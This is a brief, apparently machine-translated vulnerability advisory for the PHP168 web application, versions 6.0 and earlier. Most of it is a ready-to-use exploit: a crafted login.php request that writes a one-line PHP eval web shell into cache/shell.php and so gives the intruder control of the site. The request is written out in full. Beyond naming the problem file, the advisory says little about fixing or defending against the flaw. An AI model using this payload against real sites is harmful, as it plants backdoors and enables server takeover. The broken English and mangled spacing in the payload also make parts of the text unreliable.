Danger level: high
//Looks like more and more public.
Affected versions: PHP168 6.0 the following versions
Intruders can be in the user landing page to construct a special statement, the PHP word written to the cache directory, so as to obtain the use of PHP168 whole Station program website the WEBSHELL permissions.
The problem file login.php
login. php? makehtml=1&chdb[htmlname]=shell. php&chdb[path]=cache&content=<? php%2 0@eval($_POST[a]);?& gt;
Write to: cache/shell.php